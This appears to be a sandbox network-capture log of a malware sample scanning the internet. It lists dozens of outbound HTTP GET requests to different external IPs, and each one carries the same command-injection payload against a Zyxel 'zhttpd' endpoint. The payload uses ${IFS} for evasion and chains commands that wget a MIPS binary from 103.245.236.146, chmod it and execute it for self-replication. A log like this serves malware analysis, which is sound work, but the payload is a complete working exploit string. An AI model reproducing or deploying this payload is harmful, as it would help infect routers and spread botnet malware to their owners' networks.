                                                        Jan 28, 2024 10:13:02.586285114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6887192.168.2.1447502147.95.52.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586324930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6888192.168.2.1452410148.74.193.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586348057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6889192.168.2.146069481.182.7.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586369991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6890192.168.2.145153446.54.112.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586407900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6891192.168.2.1439602126.133.32.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586452961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6892192.168.2.1436598114.65.209.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586505890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6893192.168.2.1438058140.245.82.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586517096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6894192.168.2.145366836.66.158.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586549997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6895192.168.2.1459726199.124.117.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586576939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6896192.168.2.1450386143.78.17.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586631060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6897192.168.2.145099295.97.74.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586647987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6898192.168.2.1443696191.69.217.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586685896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6899192.168.2.1451544120.96.161.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586724043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6900192.168.2.143779860.149.29.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586756945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6901192.168.2.1435920149.217.148.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586786032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6902192.168.2.145892260.178.238.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586836100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6903192.168.2.1453540137.51.121.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586869955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6904192.168.2.1451702147.248.121.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586908102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6905192.168.2.143447873.245.249.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586947918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6906192.168.2.1444626220.159.23.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586990118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6907192.168.2.145252692.167.136.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587035894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6908192.168.2.1439428172.170.242.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587069035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6909192.168.2.1445260123.90.8.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587105036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6910192.168.2.145196886.208.112.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587158918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6911192.168.2.1442354205.238.214.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587184906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6912192.168.2.1455416158.214.219.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587228060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6913192.168.2.1452250180.205.50.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587255955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6914192.168.2.1449650115.145.177.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587285995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6915192.168.2.1435708206.238.14.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587330103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6916192.168.2.1456680210.160.23.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587357044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6917192.168.2.143866045.67.79.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587384939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6918192.168.2.146094437.221.47.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587450027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6919192.168.2.143839879.33.41.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587475061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6920192.168.2.144521281.84.224.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587521076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6921192.168.2.1438392136.53.74.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587574959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6922192.168.2.145704450.195.154.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587613106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6923192.168.2.1435270170.46.170.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587635994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6924192.168.2.14343145.101.31.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587711096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6925192.168.2.144866649.139.119.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587728977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6926192.168.2.1441650116.188.106.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587763071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6927192.168.2.144593053.158.117.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587791920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6928192.168.2.144735693.125.93.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587816954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6929192.168.2.145266693.197.27.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587858915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6930192.168.2.144460641.214.183.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587914944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6931192.168.2.144644297.247.191.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.587944031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6932192.168.2.1456556129.95.208.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588007927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6933192.168.2.144467470.170.244.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588032961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6934192.168.2.1454704217.4.162.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588080883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6935192.168.2.1442648151.139.180.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588129044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6936192.168.2.1456674161.240.160.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588160038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6937192.168.2.145212864.35.92.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588187933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6938192.168.2.144951851.76.29.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588215113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6939192.168.2.1445832136.210.95.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588277102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6940192.168.2.1455716154.149.244.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588315010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6941192.168.2.1435240220.61.91.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588361979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6942192.168.2.1437450168.133.78.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588403940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6943192.168.2.1439010170.150.86.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588443995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6944192.168.2.14484862.188.240.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588478088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6945192.168.2.143592278.237.41.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588510036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6946192.168.2.1456768208.180.49.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588537931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6947192.168.2.1455588213.20.114.17443
                                                        TimestampBytes transferredDirectionData
